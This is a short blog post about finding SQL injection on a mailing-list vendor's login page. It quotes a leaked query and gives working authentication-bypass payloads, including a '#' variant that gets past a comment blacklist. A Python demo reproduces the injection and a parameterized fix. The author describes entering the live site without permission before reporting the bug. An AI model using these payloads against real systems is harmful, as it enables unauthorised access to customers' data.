Saturday, April 11, 2009

hah, sending 50k emails a day?

Today I got an email from a company that will print your lovely designed business card for an outrageous amount of money. Now, getting an email isn't that bad; however, I got the email 3 times in the last 2 months, which is in my opinion too much! So I decided to inspect the email a bit more closely, and I noticed that they used a website that sells these kinds of mailing lists.

I'm in it! No! Ahh, get me out... wait, let's check their website first...
Wow, 9 errors, all based on file inclusion and SQL injection.

So I managed to get to their login page, and just trying to log in with username ' and password ' gave me the following error:

SELECT `id`, `username` FROM `core__user` WHERE 1 AND (`core__user`.`username` = ''') AND (`core__user`.`active` = 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))' at line 1


How nice of them, printing the entire query for me! The first thing you might notice is: why the hell are they escaping the password but not the username? Why?!

So, looking at the query,
') OR 1=1 --
should do the trick, you'd say... nope, it didn't. Apparently they disabled the comment tags -- and /*. But luckily we have a third. Yes! It's the #!
') OR 1=1 #
That let me in with full access to all their customers. I could see who sent what email and to whom. The company I got the email from sent around 50k emails a day, which is like lol.
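To make the mechanics concrete, here is an added example (my own code, not the vendor's and not from the original post) that rebuilds the login query exactly as the error page printed it: the username is pasted into the SQL string raw while only the password is escaped. It runs against an in-memory SQLite database instead of MySQL, so the assumed table contents, the fake ENCODE() function registered with SQLite, and the stand-in quote escaping (doubling the quote, where MySQL would backslash it) are all constructed for the demonstration. Because SQLite does not understand MySQL's # comment, the executed bypass uses -- ; the blacklist function only shows why a filter that strips -- and /* still lets the # variant through. The parameterized login next to it is the fix: the payload becomes a literal username and matches nothing.

```python
import hashlib
import sqlite3

# Constructed sample rows standing in for the vendor's core__user table.
USERS = [
    (1, "alice", "yes", "s3cret"),
    (2, "bob", "yes", "hunter2"),
    (3, "carol", "no", "retired"),   # inactive account
]

# Same key the printed query used; the key itself is irrelevant to the injection.
KEY = "z4p3DQSC"


def fake_encode(password: str, key: str) -> str:
    """Assumed stand-in for MySQL's ENCODE(pw, key), registered as a SQLite
    function below so the vulnerable query can be kept verbatim."""
    return hashlib.sha256((key + password).encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.create_function("ENCODE", 2, fake_encode)
    conn.execute("CREATE TABLE core__user "
                 "(id INTEGER, username TEXT, active TEXT, password TEXT)")
    conn.executemany("INSERT INTO core__user VALUES (?, ?, ?, ?)",
                     [(i, u, a, fake_encode(p, KEY)) for i, u, a, p in USERS])
    return conn


def escape(s: str) -> str:
    """The quote escaping the site applied to the password only (SQLite style)."""
    return s.replace("'", "''")


def build_vulnerable_query(username: str, password: str) -> str:
    """Mirrors the printed query: username interpolated raw, password escaped."""
    return ("SELECT id, username FROM core__user WHERE 1 "
            f"AND (username = '{username}') "
            "AND (active = 'yes') "
            f"AND (password = ENCODE('{escape(password)}', '{KEY}'))")


def login_vulnerable(conn, username, password):
    return conn.execute(build_vulnerable_query(username, password)).fetchall()


def login_safe(conn, username, password):
    """The fix: both values travel as bound parameters, never as SQL text."""
    return conn.execute(
        "SELECT id, username FROM core__user WHERE 1 AND (username = ?) "
        f"AND (active = 'yes') AND (password = ENCODE(?, '{KEY}'))",
        (username, password)).fetchall()


def strip_comments(s: str) -> str:
    """The kind of blacklist the site seemed to use: drops -- and /* but not #."""
    return s.replace("--", "").replace("/*", "")


def demo() -> dict:
    conn = make_db()
    payload = "') OR 1=1 --"          # closes the parenthesis, comments out the rest
    return {
        "legit": login_vulnerable(conn, "alice", "s3cret"),
        "wrong_pw": login_vulnerable(conn, "alice", "wrong"),
        # escaping the password does work: this stays inside the string literal
        "pw_injection": login_vulnerable(conn, "alice", "' OR 1=1 --"),
        # the unescaped username does not: every account comes back, inactive too
        "user_injection": login_vulnerable(conn, payload, "anything"),
        "safe_injection": login_safe(conn, payload, "anything"),
        "safe_legit": login_safe(conn, "alice", "s3cret"),
        # the filtered payloads: -- is gone, the MySQL # comment survives untouched
        "filtered_dashes": strip_comments(payload),
        "filtered_hash": strip_comments("') OR 1=1 #"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Compare the two injected queries that `demo()` builds: in the vulnerable one the WHERE clause collapses to `1 AND (username = '') OR 1=1`, which is true for every row, so even the inactive account leaks; the parameterized version never reaches the parser with attacker text in it, so no comment syntax, MySQL's # included, can change its shape.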

Anyway, I reported the error, and they said they fixed the 'bug'; they thanked me and told me they had removed my email address. The email address I used to send them the report wasn't even in their database. Good job. So I replied back asking them to remove the entire mywebsite.nl range.
